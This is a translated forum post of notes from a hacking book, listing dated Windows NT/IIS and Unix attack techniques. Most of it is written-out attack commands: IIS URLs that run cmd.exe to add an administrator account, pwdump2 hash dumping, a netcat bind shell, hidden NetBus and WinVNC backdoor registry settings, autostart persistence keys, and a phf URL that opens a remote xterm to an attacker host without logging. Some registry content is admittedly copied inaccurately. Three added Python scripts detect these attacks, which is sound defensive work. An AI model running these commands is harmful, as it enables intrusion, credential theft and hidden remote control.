Are we still planting trojans and waiting for the fish to bite, then port scanning, or snooping for sicp holes, or guessing passwords, or planting or mailing virus web pages and waiting for someone to open them? These elementary or intermediate attack methods?? The capability of American hackers is truly beyond imagination.

They only need a URL to launch an active attack with ease; the plot is no less dramatic than a movie, and our techniques

are, to them, nothing worth a fuss, mere child's play...... The reference book is the black-and-red "Network Hackers and System Security"

(there seems to be a new edition; 小皇 has a copy; the title and appearance are about the same)

These are the key points from the book; the author is a famous American network security expert.


Remote buffer overflow {buffer overflow}
A buffer overflow occurs when a program does not properly check the length of the input it receives, so the buffer runs out of space; any input beyond what was expected then overwrites other parts of the CPU's execution stack.
Remote command execution to obtain system administrator privileges
http://www.infowar.co.uk/mnemonix
Remotely executing a batch file to run arbitrary programs
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm


ISSHACK http://www.eeye.com
Runs code on an NT IIS web server
A privilege-escalation program that, on the local machine, can add a user to the local Administrators group

http://www.ntsecurity.net/security/getadmin.htm
Another program with similar function is sechole; its upgraded version is secholed
http://www.ntsecurity.net/security/sechole.htm
(Domain Admin group) the domain administrators (escalated) group


cmd.exe  the NT command interpreter
ntuser   a program for modifying users, groups and policies; see
http://www.pedestalsoftware.com

Sechole can be launched by entering a suitable URL in a browser pointing at the target system, for example as follows.

We upload Sechole to /W3SVC/1/ROOT/SCRIPTS
(this is C:\inetpub\SCRIPTS)
and then launch it with the URL below:
http://192.168.202.154/scripts/sechole.exe
If this succeeds it adds the IUSR_machine_name account to the Administrators group. We do not have the IUSR password, so to avoid having to log in as IUSR we usually create an account on the target system.

This is done with the ntuser utility, run through the browser with the following complicated URL (broken up here for readability):

http://192.168.202.154/scripts/cmd.exe?/c%20c:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret

In a URL, %20 means a space, so the URL above is executed as
(cmd /c hands the ntuser command to the shell and terminates itself when done)
cmd /c ntuser -s <servername> add <username> -password <password>
Above we used corpl as the server name, mallory as the user name and secret as the password.

With a similar URL the attacker can use ntuser to add mallory to the Administrators group, as follows
(LGROUP refers to a local group)
cmd /c ntuser -s <servername> LGROUP APPEND <groupname> <username>...
http://192.168.202.154/scripts/cmd.exe?/c%20c:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory

The equivalent batch-file approach (e.g. dropped via the registry or cmd) has the content:
net localgroup administrators <USER> /add

ISS (security) advisory on IIS directories, and some other potentially usable directories
http://www.iss.net/xforce/alerts/advise6.html
Below, /W3SVC/1/ROOT usually refers to C:\Inetpub\; there are also News and Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(the _vti_bin directories are all created when FrontPage is installed)

Places to put a batch file (registry autostart locations)
HKLM\software\Microsoft\CurrentVersion
\RUN [any]
\AeDebug Debugger
\WinLogon Userinit

------------------------------------------------------------ 


Running NT's Repair Disk Utility (rdisk) creates a compressed SAM file called SAM._ in %SYSTEMROOT%\repair. To restore it:
C:\>expand SAM._ SAM
NTFSDOS: NTFS driver software, http://www.sysinternals.com

Pwdump2 can get past SYSKEY
http://www.webspan.net/~tas/pwdump2
It uses DLL injection to insert its own code into another process that has higher privileges; once injected into the higher-privileged process, the malicious code can freely call internal APIs to read the SYSKEY-encrypted password hashes without having to decrypt them.
The high-privilege process pwdump2 targets is lsass.exe, the Local Security Authority Subsystem.

Pwdump2 injects itself into lsass's address space, so before running it you must manually find the process ID (PID) of lsass.exe. Below we use the NTRK pulist utility and pipe its output to find, which shows that the PID of lsass.exe is 50.
(below, C:\ is the local machine and D:\ the remote host)
D:\>pulist | find "lsass"
lsass.exe 50 NT AUTHORITY\SYSTEM
Now Pwdump2 can be run with PID 50; by default it writes its output to the screen, which can easily be redirected to a file
D:\>pwdump2 50

Characters that ASCII cannot display (Num Lock): ALT-255 or ALT-129

Using AT to schedule a remote job (note the double quotes)
C:\>at \\192.168.202.44 10:40P ""remote /s cmd secret""

To remove it use "at [job id] /delete"
Starting the Schedule service remotely (sc.exe can start the scheduler service): C:\>sc \\192.168.202.44 start schedule
Checking the remote time: C:\>net time \\192.168.202.44


(below, D:\ is the local machine and C:\ the remote)
D:\>remote /c 192.168.202.44 secret
C:\>dir winnt\repair\Sam._
C:\>@Q (ends the client)
C:\>@K (ends the server)
But remote cannot launch any program that uses the Win32 console API

remote.exe /C is client mode, /S is server mode

Remote monitoring / screen grabbing: http://www.uk.research.att.com/vnc
-----------------------------
Netcat
Below, netcat is used to listen with the command interpreter:
-L  keep listening (does not stop after a connection)
-d  run detached, with no interactive console
-e  specifies the program to launch, here the NT command interpreter
    (on the remote host it is in C:\TEMP\NC11NT)
-p  specifies the port to listen on
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080
e.g. C:\TEMP\NT11NT>nc 192.168.202.44 8080
D:\temp\regini -m \\192.168.202.44 netbus.txt

regini.exe from the NTRK can add the necessary entries directly to the remote Registry.

REGINI reads a text file as the input for its Registry changes, so we must create a file called Netbus.txt
D:\temp\regini -m \\192.168.202.44 netbus.txt
The file content is as follows !!! For details please consult the book in the bookstore, I'm not sure whether I copied it correctly !!!

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Genera
Accept=1
TCPPort=80
Visibility=3   (run in hidden mode)
AccessMode=2
AutoStart=1    (run when Windows starts)

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Protection
password=impossible

How to use WinVNC: step 1, copy the necessary files to the target system (winVNC.exe, VNCHooks.dll, OMNITHREAD_RT.DLL)
2. Set the password for the program; create a file called WINVNC.INI with the following content

!!! For details please consult the book in the bookstore, I'm not sure whether I copied it correctly !!!
HKEY_USER\.DEFAULT\software\ORL\WinVNC3
SocketConnect=REG_DWORD 0x00000001
password=REG_BINARY 0x00000008

Then use regini to load these values into the remote Registry
C:\>regini -m \\192.168.202.33 winvnc.ini

The NTRK regdmp utility can dump the Registry
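As an added example (not from these notes or from the book), the following Python script parses a regini/regdmp-style text dump such as the ones above and reports what a defender would look for in it: configuration keys of the remote-control tools named on this page (NetBus, and WinVNC under the default-user profile) and the autostart locations listed earlier (Run, AeDebug Debugger, Winlogon Userinit). The full key paths, the simple "key line followed by Name=value lines" input format and the sample dump are assumptions constructed for this example.

```python
# Registry trees of the remote-control tools named on this page (assumed full paths).
REMOTE_CONTROL_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server": "NetBus server",
    r"HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3": "WinVNC (default-user profile)",
}

# Autostart locations listed on this page, spelled out as full key paths.
# A value name of None means every value under the key is an autostart entry.
PERSISTENCE_KEYS = {
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run": None,
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug": "Debugger",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon": "Userinit",
}

# Constructed sample in the "key line, then Name=value lines" form used in the
# notes above; it is not a dump from any real machine.
SAMPLE_REG_TEXT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\General
Accept=1
TCPPort=80
Visibility=3
AccessMode=2
AutoStart=1

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit=C:\WINNT\system32\userinit.exe,C:\TEMP\helper.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
SystemTray=SysTray.Exe
"""


def parse_reg_text(text):
    """Parse 'key path' lines followed by 'Name=value' lines into {key: {name: value}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.upper().startswith("HKEY_"):
            current = line
            keys.setdefault(current, {})
        elif "=" in line and current is not None:
            name, _, value = line.partition("=")
            keys[current][name.strip()] = value.strip()
    return keys


def audit(keys):
    """Return (key, message) findings for remote-control tool keys and autostart entries."""
    findings = []
    for key, values in keys.items():
        lowered = key.lower()
        for prefix, label in REMOTE_CONTROL_KEYS.items():
            if lowered.startswith(prefix.lower()):
                findings.append((key, "remote-control tool configuration: " + label))
                if values.get("AutoStart") == "1":
                    findings.append((key, "configured to start with Windows (AutoStart=1)"))
                if values.get("Visibility") == "3":
                    findings.append((key, "configured to run hidden (Visibility=3)"))
        for path, value_name in PERSISTENCE_KEYS.items():
            if lowered != path.lower():
                continue
            if value_name is None:
                for name, value in values.items():
                    findings.append((key, "Run entry %s = %s" % (name, value)))
            elif value_name == "Userinit" and value_name in values:
                # The default Userinit is userinit.exe alone; anything appended to it is suspect.
                extras = [p.strip() for p in values[value_name].split(",")
                          if p.strip() and "userinit.exe" not in p.lower()]
                for extra in extras:
                    findings.append((key, "Userinit lists extra program " + extra))
            elif value_name in values:
                findings.append((key, "%s = %s" % (value_name, values[value_name])))
    return findings


if __name__ == "__main__":
    for key, message in audit(parse_reg_text(SAMPLE_REG_TEXT)):
        print("%s\n    %s" % (key, message))
```

The same audit can be run over the output of a regdmp dump once it has been reduced to the key/Name=value form the parser expects.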

Finally, install WinVNC as a service and start it with the following commands (remember these are run on the remote host)

C:\>WinVNC -install
C:\>net start winvnc

Now we can start vncviewer and connect to our target; the dialog below is set to connect to the IP at "display 0", and the next step asks for the password
[vncviewer dialog: VNC server: 192.168.202.33.0]

To be continued.....

Intercepting password changes: http://www.ntsecurity.net/security/passworddll.html

The following example displays the source code directly (in Netscape it is saved as a file)
http://www.Company.com/scripts/files.asp::$DATA
Adding a period after the ASP file name also gives a chance to see the source file; the hex-encoded form gets around the patched version

http://www.Company.com/code/example.asp.
http://www.Company.com/code/example%2easp
-------------------------------------- 

A machine's SID is a string of numbers beginning with S-1 and divided into several segments by hyphens; the last group of digits is called the RID. NT's built-in users and groups all have predefined RIDs: for example the Administrator's RID is always 500 and Guest's is 501. A hacker can use sid2user with a known SID and RID 500 to find the administrator's account name (even if it has been renamed).
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 500
(the S-1 and the hyphens are omitted)
http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt
http://www.ntmag.com/Magazine/Article.cfm?ArticleID=3143
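As an added example that is not part of these notes, the following Python code does the SID arithmetic described above from the defender's side: it splits a textual SID into its identifier authority and sub-authorities, extracts the RID, and checks a list of (SID, account name) pairs for built-in accounts whose RID is 500 or 501 but whose name has been changed, which is exactly what a sid2user lookup would reveal. The sample account list is constructed.

```python
import re

# Well-known RIDs of the NT built-in accounts mentioned above.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
}

# S-1-<identifier authority>-<sub-authority>-...-<RID>
SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split a textual SID into (identifier authority, [sub-authorities...])."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a valid SID: %r" % (sid,))
    authority = int(m.group(1))
    sub_authorities = [int(x) for x in m.group(2).split("-") if x]
    return authority, sub_authorities


def rid_of(sid):
    """The RID is the last sub-authority."""
    return parse_sid(sid)[1][-1]


def machine_sid(sid):
    """Drop the RID to get the machine (or domain) SID shared by all of its accounts."""
    authority, sub_authorities = parse_sid(sid)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in sub_authorities[:-1]))


def find_renamed_builtins(accounts):
    """accounts: iterable of (sid, name).

    Returns (name, rid, default_name) for accounts whose RID is a well-known
    built-in RID but whose name differs from the default: renaming does not
    change the RID, so the account stays identifiable."""
    renamed = []
    for sid, name in accounts:
        rid = rid_of(sid)
        default = WELL_KNOWN_RIDS.get(rid)
        if default is not None and name.lower() != default.lower():
            renamed.append((name, rid, default))
    return renamed


# Constructed sample: one machine, with Administrator renamed to "root_admin".
SAMPLE_ACCOUNTS = [
    ("S-1-5-21-1004336348-1177238915-682003330-500", "root_admin"),
    ("S-1-5-21-1004336348-1177238915-682003330-501", "Guest"),
    ("S-1-5-21-1004336348-1177238915-682003330-1001", "mallory"),
]

if __name__ == "__main__":
    print("machine SID:", machine_sid(SAMPLE_ACCOUNTS[0][0]))
    for name, rid, default in find_renamed_builtins(SAMPLE_ACCOUNTS):
        print("%s has RID %d: this is the built-in %s account, renamed" % (name, rid, default))
```

The practical lesson is the one the notes make: renaming Administrator changes the name but not the RID, so it is a nuisance to an attacker rather than a protection, and the real control is keeping anonymous SID/name lookups off the network.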


----------------------------------------- 
The best xterm
UNIX can display X Windows on a compatible machine, and can also display on a remote X server through port -6063; however, by adding the -display parameter an attacker can redirect his own shell to his own X server, which improves on the original PHF attack /cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd

Since the attacker already has the ability to run remote commands on the web server, a small modification of this attack gives him interactive shell access. All the attacker has to do is replace /bin/cat /etc/passwd in the command with /usr/X11R6/bin/xterm -ut -display evil_hackers_IP:0.0. The complete command is:
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0

The above runs xterm on the remote web server and displays it on the attacker's (evil_hackers) X server (display ID 0; screen ID 0). Because we added the -ut parameter, this action is not recorded by the system, so the attacker obtains interactive shell access without logging in to any server program at all.

We usually use the full path to xterm, because when the attack unfolds the PATH environment variable is not necessarily set to suit our needs; using the full path ensures the web server can find the xterm executable.
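The two URL-based attacks in these notes, the cmd.exe/ntuser URLs against IIS earlier and the phf xterm variant just described, share a pattern a web-server log reviewer can look for: percent-encoded spaces and newlines smuggled into a request so that a shell command follows the CGI parameter. The following Python script is an added example, not from the notes or the book; it decodes each request URI from constructed common-log-format lines and applies a few pattern rules (command interpreter in the path, a decoded newline in the query, an absolute path to a Unix binary, the account tools named above, and the ASP trailing-dot / ::$DATA source-disclosure probes). The log lines, rule names and client addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed common-log-format lines modelled on the requests discussed in
# the notes; they are not real traffic.
SAMPLE_LOG = """\
192.168.202.9 - - [01/Jan/1999:10:40:01 +0800] "GET /scripts/cmd.exe?/c%20c:\\inetpub\\scripts\\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret HTTP/1.0" 200 512
192.168.202.9 - - [01/Jan/1999:10:41:17 +0800] "GET /scripts/cmd.exe?/c%20c:\\inetpub\\scripts\\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory HTTP/1.0" 200 498
10.0.0.7 - - [01/Jan/1999:10:42:03 +0800] "GET /cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0 HTTP/1.0" 200 331
10.0.0.8 - - [01/Jan/1999:10:42:50 +0800] "GET /code/example.asp. HTTP/1.0" 200 2048
10.0.0.9 - - [01/Jan/1999:10:43:12 +0800] "GET /index.html HTTP/1.0" 200 1024
"""

# client ident user [timestamp] "METHOD URI PROTOCOL" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')

# Each rule is applied to the percent-decoded request URI, so %20 and %0a
# have already become a space and a newline.
RULES = [
    ("cmd.exe invoked through the web server", re.compile(r"/cmd\.exe\?/c\b", re.I)),
    ("newline injected into CGI query (%0a/%0d)", re.compile(r"[\r\n]")),
    ("absolute path to a Unix binary in request", re.compile(r"/(?:usr/(?:X11R6/)?)?bin/\S+")),
    ("account or group manipulation tool in request",
     re.compile(r"\b(?:ntuser|net\s+localgroup|lgroup)\b", re.I)),
    ("ASP source-disclosure probe (trailing dot or ::$DATA)",
     re.compile(r"\.asp(?:\.|::\$DATA)(?:$|\?)", re.I)),
]


def parse_line(line):
    """Return a dict for one log line, or None if it is not in common log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, timestamp, method, uri, status = m.groups()
    return {
        "client": client,
        "time": timestamp,
        "method": method,
        "uri": uri,
        "decoded": unquote(uri),  # decode before matching, or %20/%0a hide the command
        "status": int(status),
    }


def analyze(log_text):
    """Return [(client, decoded_uri, [matched rule names])] for every request that hits a rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, pattern in RULES if pattern.search(rec["decoded"])]
        if hits:
            findings.append((rec["client"], rec["decoded"], hits))
    return findings


if __name__ == "__main__":
    for client, decoded, hits in analyze(SAMPLE_LOG):
        print(client, repr(decoded))
        for hit in hits:
            print("    ", hit)
```

Decoding first is the essential step: the raw log line for the phf request contains no newline and no space, and a rule written against the encoded form is trivially evaded by alternative encodings such as the %2e trick shown earlier for ASP.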


=================================================== 

port    service
7       echo
9       discard
13      daytime
19      chargen
21      ftp
22      ssh
23      telnet
25      smtp
25      smap
37      time
53      dns
79      finger
80      http
110     pop3
111     sunrpc
139     netbios
143     imap
443     https
512     exec
513     login
514     shell
2049    nfs
4045    lockd
31337   UDP (BO)
12345   TCP (NetBus)
1394    DVD
31337   unassigned
12345   unassigned

135-139 UDP and TCP/IP

Linux network-topology discovery tool: http://www.marko.net/cheops
Super site-grabbing software: Sam Spade from http://www.blighty.com/products/spade, which also has Crawl Website
Leaks file contents, as long as the attacker knows the file location and sends the request with a non-standard URL....

Details: http://www.microsoft.com/security/bulletins/ms99-010.asp


Network 007: http://www.samspade.org/
OS fingerprinting tool Queso: http://www.apostols.org/projectz/
Network route map: VisualRoute, http://www.visualroute.com
Network-topology exploration tool: http://www.marko.net/cheops
http://www.home.cs.utwente.ht/schoenw/scotty Tkined, originally part of the Scotty library

nmap update/submission tool: http://www.insecure.org:80/cgi-bin/nmap-submit.cgi

http://www.remotelyanywhere.com web-based NT administration tool Remotely Anywhere
2. Remotely Possible / Control IT
Control IT from http://www.cai.com can be used on Windows, Linux and Solaris
http://www.uk.research.att.com/Vnc


queue: a processor's job queue
dual-homed: dual-homed host
HTML newline code: %0a
HTML space code: %20
Virtual: virtual
Private: private
back channel: return channel; definition: a communication channel whose origin is the target system rather than the attacker's side
shared library: shared library
signal: signal
alias: alias